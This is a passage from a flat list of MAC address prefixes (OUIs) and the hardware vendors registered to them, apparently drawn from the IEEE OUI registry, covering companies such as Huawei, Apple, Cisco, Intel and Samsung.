CO.,LTD 984874 HUAWEI TECHNOLOGIES CO.,LTD 1CA681 HUAWEI TECHNOLOGIES CO.,LTD E8A660 HUAWEI TECHNOLOGIES CO.,LTD CC242E Shenzhen SuperElectron Technology Co.,Ltd. F0016E Tianyi Telecom Terminals Company Limited EC0BAE Hangzhou BroadLink Technology Co.,Ltd 802511 ITEL MOBILE LIMITED D0CFD8 Huizhou Boshijie Technology Co.,Ltd 2CBEEB Nothing Technology Limited 7409AC Quext, LLC 509A46 Safetrust Inc 10D561 Tuya Smart Inc. F0A3B2 Hui Zhou Gaoshengda Technology Co.,LTD 5C625A CANON INC. 7C0A3F Samsung Electronics Co.,Ltd 08AA89 zte corporation 04D60E FUNAI ELECTRIC CO., LTD. 3802DE Sercomm Corporation. B881FA Apple, Inc. 9C760E Apple, Inc. 94EA32 Apple, Inc. 50F4EB Apple, Inc. 28C709 Apple, Inc. A4352D TRIZ Networks corp. 082E36 Huawei Device Co., Ltd. C8BFFE Huawei Device Co., Ltd. F04A02 Cisco Systems, Inc 049F81 NETSCOUT SYSTEMS INC 00808C NETSCOUT SYSTEMS INC 10394E Hisense broadband multimedia technology Co.,Ltd 20A7F9 SHENZHEN OLANBOA TECHNOLOGY CO., LTD C006C3 TP-Link Corporation Limited 4024B2 Sichuan AI-Link Technology Co., Ltd. 640D22 LG Electronics (Mobile Communications) 8C31E2 DAYOUPLUS F4C7AA Marvell Semiconductors 70F088 Nintendo Co.,Ltd CCED21 Nokia Shanghai Bell Co., Ltd. FC4DA6 HUAWEI TECHNOLOGIES CO.,LTD B414E6 HUAWEI TECHNOLOGIES CO.,LTD AC9929 HUAWEI TECHNOLOGIES CO.,LTD 184859 Castlenet Technology Inc. 14517E New H3C Technologies Co., Ltd 083A38 New H3C Technologies Co., Ltd F8ABE5 shenzhen worldelite electronics co., LTD 08BB3C Flextronics Tech.(Ind) Pvt Ltd 04BA1C Huawei Device Co., Ltd. 7C3D2B Huawei Device Co., Ltd. 18C241 SonicWall 58454C Ericsson AB 3C1512 Shenzhen Huanhu Technology Co.,Ltd 58AEF1 Fiberhome Telecommunication Technologies Co.,LTD E86CC7 IEEE Registration Authority 641759 Intellivision Holdings, LLC 504348 ThingsMatrix Inc. 787A6F Juice Technology AG C0D46B Huawei Device Co., Ltd. 9C9567 Huawei Device Co., Ltd. A47B1A Huawei Device Co., Ltd. 147D05 SERCOMM PHILIPPINES INC 24E853 LG Innotek 482952 Sagemcom Broadband SAS A47E36 EM Microelectronic 98387D ITRONIC TECHNOLOGY CO . , LTD . ACD618 OnePlus Technology (Shenzhen) Co., Ltd 6C5640 BLU Products Inc 2CFDB3 Tonly Technology Co. Ltd 9CDBCB Wuhan Funshion Online Technologies Co.,Ltd 2CCE1E Cloudtronics Pty Ltd DC9A8E Nanjing Cocomm electronics co., LTD DC0077 TP-LINK TECHNOLOGIES CO.,LTD. 307C4A Huawei Device Co., Ltd. C8D884 Universal Electronics, Inc. B4A25C Cambium Networks Limited 2C71FF Amazon Technologies Inc. 48785E Amazon Technologies Inc. 20C74F SensorPush B05DD4 ARRIS Group, Inc. 184CAE CONTINENTAL F021E0 eero inc. D85982 HUAWEI TECHNOLOGIES CO.,LTD 48B25D HUAWEI TECHNOLOGIES CO.,LTD A41B34 China Mobile Group Device Co.,Ltd. 8045DD Intel Corporate 40EE15 Zioncom Electronics (Shenzhen) Ltd. 606C63 Hitron Technologies. Inc 00F361 Amazon Technologies Inc. 6C0DE1 Dongguan Cannice Precision Manufacturing Co., Ltd. 3CC786 DONGGUAN HUARONG COMMUNICATION TECHNOLOGIES CO.,LTD. 88C3E5 Betop Techonologies E428A4 Prama India Private Limited 943A91 Amazon Technologies Inc. 002DB3 AMPAK Technology,Inc. E4FD45 Intel Corporate 145051 SHARP Corporation E8D765 HUAWEI TECHNOLOGIES CO.,LTD 502DFB IGShare Co., Ltd. 408C1F GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 04F03E Huawei Device Co., Ltd. 78E22C Huawei Device Co., Ltd. C0D026 Huawei Device Co., Ltd. C4D0E3 Intel Corporate 28C87C zte corporation 80C501 OctoGate IT Security Systems GmbH 14D19E Apple, Inc. 40C711 Apple, Inc. 5C7017 Apple, Inc. 8CEC7B Apple, Inc. 0040DD HONG TECHNOLOGIES E45E1B Google, Inc. C430CA SD Biosensor 28052E Dematic Corp F42A7D TP-LINK TECHNOLOGIES CO.,LTD. 04F993 Infinix mobility limited BCBD9E ITEL MOBILE LIMITED 74504E New H3C Technologies Co., Ltd A4423B Intel Corporate ECBE5F Vestel Elektronik San ve Tic. A.S. 70CF49 Intel Corporate 4851C5 Intel Corporate 20EFBD Roku, Inc BC6D05 Dusun Electron Co.,Ltd. C0E018 HUAWEI TECHNOLOGIES CO.,LTD 5CE747 HUAWEI TECHNOLOGIES CO.,LTD A8FFBA HUAWEI TECHNOLOGIES CO.,LTD 7CC2C6 TP-Link Corporation Limited 089AC7 zte corporation 6C0309 Cisco Systems, Inc BCD295 Cisco Systems, Inc F03965 Samsung Electronics Co.,Ltd EC7CB6 Samsung Electronics Co.,Ltd 58A639 Samsung Electronics Co.,Ltd A4E57C Espressif Inc. 8C0FC9 Huawei Device Co., Ltd. 304E1B Huawei Device Co., Ltd. 744CA1 Liteon Technology Corporation B4B291 LG Electronics 70617B Cisco Systems, Inc A0024A IEEE Registration Authority C86C3D Amazon Technologies Inc. 389052 HUAWEI TECHNOLOGIES CO.,LTD C0F6EC HUAWEI TECHNOLOGIES CO.,LTD CC208C HUAWEI TECHNOLOGIES CO.,LTD 885A85 Wistron Neweb Corporation D80093 Aurender Inc. E01FED Nokia Shanghai Bell Co., Ltd. 30D941 Raydium Semiconductor Corp. 687627 Zhuhai Dingzhi Electronic Technology Co., Ltd 948ED3 Arista Networks 7040FF Huawei Device Co., Ltd. 34D693 Huawei Device Co., Ltd. 24E4C8 Fiberhome Telecommunication Technologies Co.,LTD 28D044 Shenzhen Xinyin technology company 9C9AC0 LEGO System A/S A09F10 SHENZHEN BILIAN ELECTRONIC CO.,LTD 201B88 Dongguan Liesheng Electronic Co., Ltd. E8EB34 Cisco Systems, Inc 3CBDC5 Arcadyan Corporation A8DA0C SERVERCOM (INDIA) PRIVATE LIMITED 5860D8 ARRIS Group, Inc. 50A5DC ARRIS Group, Inc. 249493 FibRSol Global Network Limited 5C10C5 Samsung Electronics Co.,Ltd A8407D GD Midea Air-Conditioning Equipment Co.,Ltd. FC4B57 Peerless Instrument Division of Curtiss-Wright 18EE86 Novatel Wireless Solutions, Inc. A4AAFE Huawei Device Co., Ltd. F83B7E Huawei Device Co., Ltd. 8815C5 Huawei Device Co., Ltd. 74B7B3 Shenzhen YOUHUA Technology Co., Ltd DC9BD6 TCT mobile ltd 04E77E We Corporation Inc. 74ECB2 Amazon Technologies Inc. 4C52EC SOLARWATT GmbH 146B9A zte corporation F85329 HUAWEI TECHNOLOGIES CO.,LTD DC8C1B vivo Mobile Communication Co., Ltd. 9C28B3 Apple, Inc. A07817 Apple, Inc. 5C8730 Apple, Inc. B41BB0 Apple, Inc. 58D349 Apple, Inc. F434F0 Apple, Inc. B08C75 Apple, Inc. 68D48B Hailo Technologies Ltd. 40D4BD SK Networks Service CO., LTD. 841B77 Intel Corporate 7CC294 Beijing Xiaomi Mobile Software Co., Ltd E0E2E6 Espressif Inc. E80AEC Jiangsu Hengtong Optic-Electric Co., LTD C4DE7B Huawei Device Co., Ltd. 6C1A75 Huawei Device Co., Ltd. 6C7637 Huawei Device Co., Ltd. 087C39 Amazon Technologies Inc. 141333 AzureWave Technology Inc. A4178B HUAWEI TECHNOLOGIES CO.,LTD 94B271 HUAWEI TECHNOLOGIES CO.,LTD 78058C mMax Communications, Inc. C4A72B SHENZHEN CHUANGWEI-RGB ELECTRONICS CO.,LTD D0C31E JUNGJIN Electronics Co.,Ltd C43772 Virtuozzo International GmbH CC3B27 TECNO MOBILE LIMITED 3CD2E5 New H3C Technologies Co., Ltd D810CB Andrea Informatique FC1928 Actions Microelectronics Co., Ltd 00301F OPTICAL NETWORKS, INC. 0858A5 Beijing Vrv Software Corpoaration Limited. 001391 OUEN CO.,LTD. 582429 Google, Inc. 00B881 New platforms LLC B098BC Huawei Device Co., Ltd. 24016F Huawei Device Co., Ltd. CCF55F E FOCUS INSTRUMENTS INDIA PRIVATE LIMITED E0913C Kyeungin CNS Co., Ltd. D05919 zte corporation 9C7370 HUAWEI TECHNOLOGIES CO.,LTD 983F60 HUAWEI TECHNOLOGIES CO.,LTD C03FDD HUAWEI TECHNOLOGIES CO.,LTD 303235 Qingdao Intelligent&Precise Electronics Co.,Ltd. 64F947 Senscomm Semiconductor Co., Ltd. DC00B0 FREEBOX SAS 707414 Murata Manufacturing Co., Ltd. A0764E Espressif Inc. 5CED8C Hewlett Packard Enterprise 30AFCE vivo Mobile Communication Co., Ltd. B43161 Realme Chongqing Mobile Telecommunications Corp.,Ltd. 10D7B0 Sagemcom Broadband SAS B4FBE3 AltoBeam (China) Inc. 188740 Xiaomi Communications Co Ltd 341CF0 Xiaomi Communications Co Ltd CC4F5C IEEE Registration Authority FC6DD1 APRESIA Systems, Ltd. 6C09BF Fiberhome Telecommunication Technologies Co.,LTD C0C9E3 TP-LINK TECHNOLOGIES CO.,LTD. F88C21 TP-LINK TECHNOLOGIES CO.,LTD. C4278C Huawei Device Co., Ltd. 7C73EB Huawei Device Co., Ltd. E48F1D Huawei Device Co., Ltd. 84E342 Tuya Smart Inc. FCCD2F IEEE Registration Authority 808FE8 Intelbras 18CC18 Intel Corporate 5C3400 Hisense Electric Co.,Ltd C03C59 Intel Corporate 4C3BDF Microsoft Corporation C8E600 HUAWEI TECHNOLOGIES CO.,LTD D4D51B HUAWEI TECHNOLOGIES CO.,LTD 2491BB HUAWEI TECHNOLOGIES CO.,LTD 645E10 HUAWEI TECHNOLOGIES CO.,LTD ECF22B TECNO MOBILE LIMITED E45F01 Raspberry Pi Trading Ltd 3059B7 Microsoft A4AC0F Huawei Device Co., Ltd. CCFF90 Huawei Device Co., Ltd. 309610 Huawei Device Co., Ltd. C816DA Realme Chongqing Mobile Telecommunications Corp.,Ltd. B04414 New H3C Technologies Co., Ltd D854A2 Extreme Networks, Inc. 5405DB LCFC(HeFei) Electronics Technology co., ltd 003054 Castlenet Technology Inc. 30578E eero inc. FCB3BC Intel Corporate 445943 zte corporation 343654 zte corporation 748F3C Apple, Inc. 40F946 Apple, Inc. 48A2B8 Chengdu Vision-Zenith Tech.Co,.Ltd 58E873 HANGZHOU DANGBEI NETWORK TECH.Co.,Ltd C0B8E6 Ruijie Networks Co.,LTD 1CFE2B Amazon Technologies Inc. A4AE12 Hon Hai Precision Industry Co., Ltd. 9C9D7E Beijing Xiaomi Mobile Software Co., Ltd 7412B3 CHONGQING FUGUI ELECTRONICS CO.,LTD. 9447B0 BEIJING ESWIN COMPUTING TECHNOLOGY CO., LTD E45AD4 Eltex Enterprise Ltd. 84225E SHENZHEN TECHNEWCHIP TECHNOLOGY CO.,LTD. A0681C GD Midea Air-Conditioning Equipment Co.,Ltd. 6C442A HUAWEI TECHNOLOGIES CO.,LTD A47CC9 HUAWEI TECHNOLOGIES CO.,LTD C40D96 HUAWEI TECHNOLOGIES CO.,LTD 44A54E Qorvo International Pte. Ltd. A8698C Oracle Corporation DCA3A2 Feng mi(Beijing)technology co., LTD F85C7D Shenzhen Honesty Electronics Co.,Ltd. 842AFD HP Inc. 90F644 Huawei Device Co., Ltd. A83512 Huawei Device Co., Ltd. B030C8 Teal Drones, Inc. D4F337 Xunison Ltd. 44AF28 Intel Corporate D4A651 Tuya Smart Inc. EC570D AFE Inc. 7C25DA FN-LINK TECHNOLOGY LIMITED 001368 Saab Danmark A/S 8C941F Cisco Systems, Inc 687DB4 Cisco Systems, Inc 846B48 ShenZhen EepuLink Co., Ltd. B460ED Beijing Xiaomi Mobile Software Co., Ltd 00300B mPHASE Technologies, Inc. C01850 Quanta Computer Inc. 4427F3 70mai Co.,Ltd. 30CC21 zte corporation 646C80 CHONGQING FUGUI ELECTRONICS CO.,LTD. 0026C0 EnergyHub 80EACA Dialog Semiconductor Hellas SA 047D7B Quanta Computer Inc. 089E01 Quanta Computer Inc. A81E84 Quanta Computer Inc. 000896 Printronix, Inc. 0025DC Sumitomo Electric Industries, Ltd BC7F7B Huawei Device Co., Ltd. F0FAC7 Huawei Device Co., Ltd. DC41A9 Intel Corporate B46F2D Wahoo Fitness FC1499 Aimore Acoustics Incorporation 189552 1MORE 98C7A4 Shenzhen HS Fiber Communication Equipment CO., LTD 00BED5 New H3C Technologies Co., Ltd 5C857E IEEE Registration Authority 8803E9 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 345840 HUAWEI TECHNOLOGIES CO.,LTD 5C647A HUAWEI TECHNOLOGIES CO.,LTD DCEF80 HUAWEI TECHNOLOGIES CO.,LTD 6032B1 TP-LINK TECHNOLOGIES CO.,LTD. 7CFD6B Xiaomi Communications Co Ltd 7CC77E Fiberhome Telecommunication Technologies Co.,LTD A0CFF5 zte corporation 98B3EF Huawei Device Co., Ltd. 0CDC7E Espressif Inc. 2098D8 Shenzhen Yingdakang Technology CO., LTD 182649 Intel Corporate 0005C9 LG Innotek ACF108 LG Innotek 50F958 Huawei Device Co., Ltd. C0A36E SKY UK LIMITED 34C93D Intel Corporate 1C012D Ficer Technology 3CA62F AVM Audiovisuelles Marketing und Computersysteme GmbH 08ED9D TECNO MOBILE LIMITED E41F7B Cisco Systems, Inc 88948F Xi'an Zhisensor Technologies Co.,Ltd 5CD5B5 Shenzhen WiSiYiLink Technology Co.,Ltd AC5FEA OnePlus Technology (Shenzhen) Co., Ltd 044AC6 Aipon Electronics Co., Ltd C0FFA8 HUAWEI TECHNOLOGIES CO.,LTD C8E42F Technical Research Design and Development 680AE2 Silicon Laboratories E86DCB Samsung Electronics Co.,Ltd 304950 IEEE Registration Authority 209E79 Universal Electronics, Inc. C87EA1 TCL MOKA International Limited 642C0F vivo Mobile Communication Co., Ltd. 3066D0 Huawei Device Co., Ltd. 3CB233 Huawei Device Co., Ltd. 0C3B50 Apple, Inc. 640BD7 Apple, Inc. A8913D Apple, Inc. 4CC95E Samsung Electronics Co.,Ltd FCA5D0 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD C85BA0 Shenzhen Qihu Intelligent Technology Company Limited E0BE03 Lite-On Network Communication (Dongguan) Limited A48873 Cisco Systems, Inc 98CBA4 Benchmark Electronics 183CB7 Huawei Device Co., Ltd. CCC261 IEEE Registration Authority 5CFE9E Wiwynn Corporation Tainan Branch 881C95 ITEL MOBILE LIMITED 002003 PIXEL POWER LTD. F02E51 Casa Systems F46942 ASKEY COMPUTER CORP 08E9F6 AMPAK Technology,Inc. 000DA1 MIRAE ITS Co.,LTD. CCD9AC Intel Corporate 347DF6 Intel Corporate 481693 Lear Corporation GmbH A4BDC4 HUAWEI TECHNOLOGIES CO.,LTD 5C9157 HUAWEI TECHNOLOGIES CO.,LTD 04CB88 Shenzhen Jingxun Software Telecommunication Technology Co.,Ltd B8804F Texas Instruments 000F2D CHUNG-HSIN ELECTRIC & MACHINERY MFG.CORP. B46293 Samsung Electronics Co.,Ltd 5C9012 Owl Cyber Defense Solutions, LLC 38F7CD IEEE Registration Authority 9C2976 Intel Corporate 241407 Xiamen Sigmastar Technology Ltd. B47947 Nutanix 04F8F8 Edgecore Networks Corporation 985949 LUXOTTICA GROUP S.P.A. 68332C KENSTEL NETWORKS LIMITED 9CBD6E DERA Co., Ltd 5C6BD7 Foshan VIOMI Electric Appliance Technology Co. Ltd. 1848CA Murata Manufacturing Co., Ltd. CC0DF2 Motorola Mobility LLC, a Lenovo Company 94434D Ciena Corporation 64E881 Aruba, a Hewlett Packard Enterprise Company 0001CD ARtem 58A87B Fitbit, Inc. C489ED Solid Optics EU N.V. 488F5A Routerboard.com 100645 Sagemcom Broadband SAS AC67B2 Espressif Inc. A84025 Oxide Computer Company 64E172 Shenzhen Qihoo Intelligent Technology Co.,Ltd C4D8F3 iZotope 8022A7 NEC Platforms, Ltd. 5C2316 Squirrels Research Labs LLC 042144 Sunitec Enterprise Co.,Ltd 18F697 Axiom Memory Solutions, Inc. A027B6 Samsung Electronics Co.,Ltd 103917 Samsung Electronics Co.,Ltd 9880EE Samsung Electronics Co.,Ltd 90EEC7 Samsung Electronics Co.,Ltd 1029AB Samsung Electronics Co.,Ltd 184ECB Samsung Electronics Co.,Ltd 60F43A Edifier International FCB698 Cambridge Industries(Group) Co.,Ltd. 4C3329 Sweroam 782B46 Intel Corporate AC4A67 Cisco Systems, Inc 900A84 Mellanox Technologies, Inc. EC7949 FUJITSU LIMITED D4D2D6 FN-LINK TECHNOLOGY LIMITED D8787F Ubee Interactive Co., Limited 9C28BF Continental Automotive Czech Republic s.r.o. 785773 HUAWEI TECHNOLOGIES CO.,LTD AC6089 HUAWEI TECHNOLOGIES CO.,LTD 843E92 HUAWEI TECHNOLOGIES CO.,LTD 708CB6 HUAWEI TECHNOLOGIES CO.,LTD 50464A HUAWEI TECHNOLOGIES CO.,LTD C4A402 HUAWEI TECHNOLOGIES CO.,LTD 0006B3 Diagraph Corporation DC333D Huawei Device Co., Ltd. 285471 Huawei Device Co., Ltd. B88E82 Huawei Device Co., Ltd. 70CA97 Ruckus Wireless E01C41 Extreme Networks, Inc. BCF310 Extreme Networks, Inc. 0887C6 INGRAM MICRO SERVICES 34E5EC Palo Alto Networks C8665D Extreme Networks, Inc. 086BD1 Shenzhen SuperElectron Technology Co.,Ltd. 345180 TCL King Electrical Appliances (Huizhou) Co., Ltd 105072 Sercomm Corporation. 98FAA7 INNONET 3CB53D HUNAN GOKE MICROELECTRONICS CO.,LTD AC3A67 Cisco Systems, Inc 00B7A8 Heinzinger electronic GmbH 980D51 Huawei Device Co., Ltd. 00ADD5 Huawei Device Co., Ltd. 905D7C New H3C Technologies Co., Ltd BC1695 zte corporation A4CFD2 Ubee Interactive Co., Limited 34CFF6 Intel Corporate B8E3B1 HUAWEI TECHNOLOGIES CO.,LTD 0020E1 ALAMAR ELECTRONICS 08F458 Huawei Device Co., Ltd. EC97B2 SUMEC Machinery & Electric Co.,Ltd. 28FA7A Zhejiang Tmall Technology Co., Ltd. 1005E1 Nokia 343794 Hamee Corp. D4DC09 Mist Systems, Inc. 4410FE Huizhou Foryou General Electronics Co., Ltd. EC316D Hansgrohe BC542F Intel Corporate 842E14 Silicon Laboratories 6CD94C vivo Mobile Communication Co., Ltd. AC1ED0 Temic Automotive Philippines Inc. 0088BA NC&C 4CA64D Cisco Systems, Inc CC7F75 Cisco Systems, Inc 20E874 Apple, Inc. D03FAA Apple, Inc. E8E98E SOLAR controls s.r.o. 64F6BB Fibocom Wireless Inc. A8A097 ScioTeq bvba F47335 Logitech Far East 90ADFC Telechips, Inc. 5CA62D Cisco Systems, Inc 5CBA2C Hewlett Packard Enterprise 40EC99 Intel Corporate 402B69 Kumho Electric Inc. A40801 Amazon Technologies Inc. 7CAB60 Apple, Inc. 44C65D Apple, Inc. 187EB9 Apple, Inc. 98006A zte corporation 1C97C5 Ynomia Pty Ltd 5CC1D7 Samsung Electronics Co.,Ltd 380146 SHENZHEN BILIAN ELECTRONIC CO.,LTD 2C5741 Cisco Systems, Inc B0B353 IEEE Registration Authority 484EFC ARRIS Group, Inc. 1C919D Dongguan Liesheng Electronic Co., Ltd. B00AD5 zte corporation 08D23E Intel Corporate 487B5E SMT TELECOMM HK 20114E MeteRSit S.R.L. FCF29F China Mobile Iot Limited company F81F32 Motorola Mobility LLC, a Lenovo Company FCE14F BRK Brands, Inc. 889655 Zitte corporation 74B6B6 eero inc. 7CDFA1 Espressif Inc. A84D4A Audiowise Technology Inc. A87EEA Intel Corporate 7894E8 Radio Bridge 547FBC iodyne F4A4D6 HUAWEI TECHNOLOGIES CO.,LTD 18300C Hisense Electric Co.,Ltd 44A56E NETGEAR 5C27D4 Shenzhen Qihu Intelligent Technology Company Limited 74D83E Intel Corporate 5043B9 OktoInform RUS 88B6EE Dish Technologies Corp 3C28A6 Alcatel-Lucent Enterprise (China) 5050A4 Samsung Electronics Co.,Ltd 8086D9 Samsung Electronics Co.,Ltd 386A77 Samsung Electronics Co.,Ltd F44955 MIMO TECH Co., Ltd. 0809C7 Zhuhai Unitech Power Technology Co., Ltd. 041DC7 zte corporation 001A4D GIGA-BYTE TECHNOLOGY CO.,LTD. 88541F Google, Inc. 900CC8 Google, Inc. 00104F Oracle Corporation 3CBF60 Apple, Inc. AC15F4 Apple, Inc. 78D162 Apple, Inc. 08F8BC Apple, Inc. 90A25B Apple, Inc. 88A479 Apple, Inc. 047295 Apple, Inc. D446E1 Apple, Inc. 141459 Vodafone Italia S.p.A. 001FD0 GIGA-BYTE TECHNOLOGY CO.,LTD. 18C04D GIGA-BYTE TECHNOLOGY CO.,LTD. 402C76 IEEE Registration Authority 80C955 Redpine Signals, Inc. 8CAAB5 Espressif Inc. 58961D Intel Corporate 68215F Edgecore Networks Corporation 44C7FC Huawei Device Co., Ltd. 7885F4 Huawei Device Co., Ltd. 0025A9 Shanghai Embedway Information Technologies Co.,Ltd 3843E5 Grotech Inc 000BCC JUSAN, S.A. 00E059 CONTROLLED ENVIRONMENTS, LTD. 00B810 Yichip Microelectronics (Hangzhou) Co.,Ltd A4B239 Cisco Systems, Inc 548D5A Intel Corporate 000A23 Parama Networks Inc 0C8E29 Arcadyan Corporation A0224E IEEE Registration Authority 6C639C ARRIS Group, Inc. C49878 SHANGHAI MOAAN INTELLIGENT TECHNOLOGY CO.,LTD 68AFFF Shanghai Cambricon Information Technology Co., Ltd. D01C3C TECNO MOBILE LIMITED B89A2A Intel Corporate DC21E2 HUAWEI TECHNOLOGIES CO.,LTD FC1BD1 HUAWEI TECHNOLOGIES CO.,LTD 582575 HUAWEI TECHNOLOGIES CO.,LTD 28DEE5 HUAWEI TECHNOLOGIES CO.,LTD 5C68D0 Aurora Innovation Inc. 10364A Boston Dynamics 6C06D6 Huawei Device Co., Ltd. A44BD5 Xiaomi Communications Co Ltd 64956C LG Electronics E83F67 Huawei Device Co., Ltd. 3446EC Huawei Device Co., Ltd. 18E777 vivo Mobile Communication Co., Ltd. 0C7A15 Intel Corporate 94D6DB NexFi 4077A9 New H3C Technologies Co., Ltd C8F319 LG Electronics (Mobile Communications) 045EA4 SHENZHEN NETIS TECHNOLOGY CO.,LTD 1CBFC0 CHONGQING FUGUI ELECTRONICS CO.,LTD. 64694E Texas Instruments F83331 Texas Instruments B4ECF2 Shanghai Listent Medical Tech Co., Ltd. C4954D IEEE Registration Authority 78B46A HUAWEI TECHNOLOGIES CO.,LTD 6CEBB6 HUAWEI TECHNOLOGIES CO.,LTD 4CF55B HUAWEI TECHNOLOGIES CO.,LTD 643139 IEEE Registration Authority 14876A Apple, Inc. E0B55F Apple, Inc. F8FFC2 Apple, Inc. E0EB40 Apple, Inc. 40A6B7 Intel Corporate 686350 Hella India Automotive Pvt Ltd 18703B Huawei Device Co., Ltd. D89E61 Huawei Device Co., Ltd. 347E00 Huawei Device Co., Ltd. 5CE50C Beijing Xiaomi Mobile Software Co., Ltd 34495B Sagemcom Broadband SAS 801609 Sleep Number AC8B9C Primera Technology, Inc. 009096 ASKEY COMPUTER CORP 2474F7 GoPro 7CD566 Amazon Technologies Inc. 80751F SKY UK LIMITED 5C710D Cisco Systems, Inc 98AF65 Intel Corporate 1CC1BC Yichip Microelectronics (Hangzhou) Co.,Ltd F855CD Visteon Corporation 442295 China Mobile Iot Limited company E85A8B Xiaomi Communications Co Ltd 441847 HUNAN SCROWN ELECTRONIC INFORMATION TECH.CO.,LTD 00AB48 eero inc. AC61B9 WAMA Technology Limited 0030B7 Teletrol Systems, Inc. 2C3AFD AVM Audiovisuelles Marketing und Computersysteme GmbH 64C901 INVENTEC Corporation B43939 Shenzhen TINNO Mobile Technology Corp. 5CCD5B Intel Corporate A0AB51 WEIFANG GOERTEK ELECTRONICS CO.,LTD 84C807 ADVA Optical Networking Ltd. 10B3C6 Cisco Systems, Inc 10B3D6 Cisco Systems, Inc F8893C Inventec Appliances Corp. 749EF5 Samsung Electronics Co.,Ltd 68BFC4 Samsung Electronics Co.,Ltd 04B1A1 Samsung Electronics Co.,Ltd A0DF15 HUAWEI TECHNOLOGIES CO.,LTD C4AD34 Routerboard.com 000733 DANCONTROL Engineering A85E45 ASUSTek COMPUTER INC. CC464E Samsung Electronics Co.,Ltd 306F07 Nations Technologies Inc. B82ADC EFR Europäische Funk-Rundsteuerung GmbH 3C894D Dr. Ing. h.c. F. Porsche AG 781735 Nokia Shanghai Bell Co., Ltd. B899AE Shenzhen MiaoMing Intelligent Technology Co.,Ltd E8D0B9 Taicang T&W Electronics 9CFFC2 AVI Systems GmbH 44D878 Hui Zhou Gaoshengda Technology Co.,LTD 7897C3 DINGXIN INFORMATION TECHNOLOGY CO.,LTD 64FB92 PPC Broadband Inc. 141346 Skyworth Digital Technology(Shenzhen) Co.,Ltd 4C90DB JL Audio 8CF112 Motorola Mobility LLC, a Lenovo Company 987A10 Ericsson AB 202681 TECNO MOBILE LIMITED 542BDE New H3C Technologies Co., Ltd F4D620 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 3C8F06 Shenzhen Libtor Technology Co.,Ltd B00875 HUAWEI TECHNOLOGIES CO.,LTD F854B8 Amazon Technologies Inc. A0D807 Huawei Device Co., Ltd. 2C780E Huawei Device Co., Ltd. 34B20A Huawei Device Co., Ltd. 98F4AB Espressif Inc. D8BFC0 Espressif Inc. 98F781 ARRIS Group, Inc. 949034 SHENZHEN CHUANGWEI-RGB ELECTRONICS CO.,LTD 20DFB9 Google, Inc. 5CCAD3 CHIPSEA TECHNOLOGIES (SHENZHEN) CORP. 500291 Espressif Inc. 001DDF Sunitec Enterprise Co.,Ltd 8C0FFA Hutec co.,ltd 50D2F5 Beijing Xiaomi Mobile Software Co., Ltd 28167F Xiaomi Communications Co Ltd 087190 Intel Corporate 782A79 Integrated Device Technology (Malaysia) Sdn. Bhd. 5885A2 Realme Chongqing MobileTelecommunications Corp Ltd A8C0EA Pepwave Limited 44AEAB GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD A4F05E GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 00071C AT&T E0E8E6 Shenzhen C-Data Technology Co., Ltd. 2CF89B Cisco Systems, Inc 80B07B zte corporation C85A9F zte corporation 847637 HUAWEI TECHNOLOGIES CO.,LTD FC9435 HUAWEI TECHNOLOGIES CO.,LTD E02481 HUAWEI TECHNOLOGIES CO.,LTD C03656 Fiberhome Telecommunication Technologies Co.,LTD B03E51 SKY UK LIMITED 1C687E Shenzhen Qihu Intelligent Technology Company Limited 786559 Sagemcom Broadband SAS 5CE883 HUAWEI TECHNOLOGIES CO.,LTD 100177 HUAWEI TECHNOLOGIES CO.,LTD 44A191 HUAWEI TECHNOLOGIES CO.,LTD 24526A Zhejiang Dahua Technology Co., Ltd. ACFE05 ITEL MOBILE LIMITED BCC31B Kygo Life A 64DF10 JingLue Semiconductor(SH) Ltd. C463FB Neatframe AS 44FB5A zte corporation 28FE65 DongGuan Siyoto Electronics Co., Ltd 1806F5 RAD Data Communications, Ltd. 7484E1 Dongguan Haoyuan Electronics Co.,Ltd 4074E0 Intel Corporate 489BD5 Extreme Networks, Inc. 60447A Water-i.d. GmbH 6023A4 Sichuan AI-Link Technology Co., Ltd. A4530E Cisco Systems, Inc 00403A IMPACT TECHNOLOGIES D05F64 IEEE Registration Authority 305714 Apple, Inc. C8B1CD Apple, Inc. 1460CB Apple, Inc. B8F12A Apple, Inc. F887F1 Apple, Inc. 807215 SKY UK LIMITED 74D637 Amazon Technologies Inc. 04A222 Arcadyan Corporation 04AB6A Chun-il Co.,Ltd. C85D38 HUMAX Co., Ltd. F8A763 Zhejiang Tmall Technology Co., Ltd. A49813 ARRIS Group, Inc. 6C2990 WiZ Connected Lighting Company Limited 04C807 Xiaomi Communications Co Ltd 4459E3 HUAWEI TECHNOLOGIES CO.,LTD 683F1E EFFECT Photonics B.V. 8C1850 China Mobile (Hangzhou) Information Technology Co., Ltd. D8D4E6 Hytec Inter Co., Ltd. 840B7C Hitron Technologies. Inc 48A73C Sichuan tianyi kanghe communications co., LTD DC54D7 Amazon Technologies Inc. 44D3CA Cisco Systems, Inc 889FAA Hella Gutmann Solutions GmbH F8E7A0 vivo Mobile Communication Co., Ltd. 2CFFEE vivo Mobile Communication Co., Ltd. 20968A China Mobile (Hangzhou) Information Technology Co., Ltd. 0035FF Texas Instruments 9835ED HUAWEI TECHNOLOGIES CO.,LTD 04885F HUAWEI TECHNOLOGIES CO.,LTD C850CE HUAWEI TECHNOLOGIES CO.,LTD D89B3B HUAWEI TECHNOLOGIES CO.,LTD 000BE4 Hosiden Corporation 4413D0 zte corporation 2462AB Espressif Inc. 0004DF TERACOM TELEMATICA S.A 084F0A HUAWEI TECHNOLOGIES CO.,LTD A8494D HUAWEI TECHNOLOGIES CO.,LTD 44004D HUAWEI TECHNOLOGIES CO.,LTD 18CF24 HUAWEI TECHNOLOGIES CO.,LTD 50F8A5 eWBM Co., Ltd. 1449BC DrayTek Corp. 20F478 Xiaomi Communications Co Ltd 88403B HUAWEI TECHNOLOGIES CO.,LTD FC8743 HUAWEI TECHNOLOGIES CO.,LTD 807693 Newag SA BC9740 IEEE Registration Authority 7438B7 CANON INC. 90735A Motorola Mobility LLC, a Lenovo Company 18B6F7 NEW POS TECHNOLOGY LIMITED 00FA21 Samsung Electronics Co.,Ltd 7C2302 Samsung Electronics Co.,Ltd 1C8259 IEEE Registration Authority 18AACA Sichuan tianyi kanghe communications co., LTD 6CAB05 